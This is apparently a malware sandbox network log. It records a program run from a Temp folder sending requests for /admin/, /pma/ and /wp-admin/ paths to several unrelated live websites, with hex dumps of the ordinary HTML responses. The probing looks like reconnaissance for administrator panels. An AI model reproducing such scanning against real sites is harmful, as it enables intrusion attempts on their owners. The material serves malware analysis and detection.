2023-12-22 20:15:11 UTC	216	IN	Data Raw: 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 09 3c 2f 68 74 6d 6c 3e 0a 09 0d 0a Data Ascii: eL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></body></html>
2023-12-22 20:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
319	192.168.2.4	56719	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	171	OUT	GET /admin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPqOrxFzmxAPiKBLPdLoVIbXPJpwWS5KzSCPcpQTgR6cXrHJFN--rD_-Hm2FZl5PcMWEkXW5N-RtwQ date: Fri, 22 Dec 2023 20:15:11 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:15:11 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:11 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
320	192.168.2.4	56715	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	178	OUT	GET /pma/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 31 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:11 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:11 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:12 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
321	192.168.2.4	57263	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	173	OUT	GET /wp-admin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	1042	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com/wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: WordPress Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y8ZcNEEhC5k5ZkSqO%2BYiJNXZesgvYoPlAyGbf4188w3B8lT0Mah2PUZekrbA9pVo1PfCpF8PeDfzqJZ25x33ZT3%2BaRyORqHlfFfWXZvT%2Ba26PhZDvtIGCHfgC4bbg3vSRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b09124aa967b4-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
322	192.168.2.4	57312	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	938	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:12 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ULE6wSbu9q67iI4XLMeacZ7sqpIaPorwF%2BUZA%2F7E1cdXvbOM9NgJ4fEj1qBk%2BDeIeTPmwjn3bNhVCXcGG1NV%2FDnUDoea%2Fu1O5Eg4l6f3LXgA8fiK2%2FZx7bqtwfKDsCyzLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b09167adf1273-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:12 UTC	431	IN	Data Raw: 37 63 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e Data Ascii: 7c00<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bn
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 65 20 2d 20 43 61 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a Data Ascii: e - CannaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 6c 6f 61 64 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c Data Ascii: load_date" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Onl
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 65 74 22 20 69 64 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 Data Ascii: et" id="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 3a 23 30 30 37 63 62 61 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 30 2c 31 32 34 2c 31 38 36 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 3a 23 30 30 36 62 61 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 2d 2d 72 67 62 3a 30 2c 31 30 37 2c 31 36 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d Data Ascii: rtant;}</style><style id="wp-block-library-inline-css" type="text/css">:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-them
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 61 64 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 33 33 30 39 36 38 2c 23 33 31 63 64 63 66 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 30 32 30 33 38 31 2c 23 32 38 37 34 66 63 29 7d 2e 68 61 73 2d 72 65 67 75 6c 61 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 36 32 35 65 6d 7d 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d Data Ascii: ade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 2a 3d 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 Data Ascii: =border-right-color]){border-right-style:solid}html :where([style=border-bottom-color]){border-bottom-style:solid}html :where([style=border-left-color]){border-left-style:solid}html :where([style=border-width]){border-style:solid}html :where([style*=b
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 62 6c 69 63 2f 63 73 73 2f 77 74 2d 69 6d 70 6f 72 74 2d 65 78 70 6f 72 74 2d 66 6f 72 2d 77 6f 6f 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 77 73 2d 69 63 6f 6e 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 72 65 77 61 72 64 73 2f 61 73 73 65 74 73 2f 6c 77 73 2d 61 64 6d 69 6e 70 61 6e 65 6c 2f 73 74 79 6c 69 6e Data Ascii: blic/css/wt-import-export-for-woo-public.css?ver=1.2.4" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="lws-icons-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woorewards/assets/lws-adminpanel/stylin
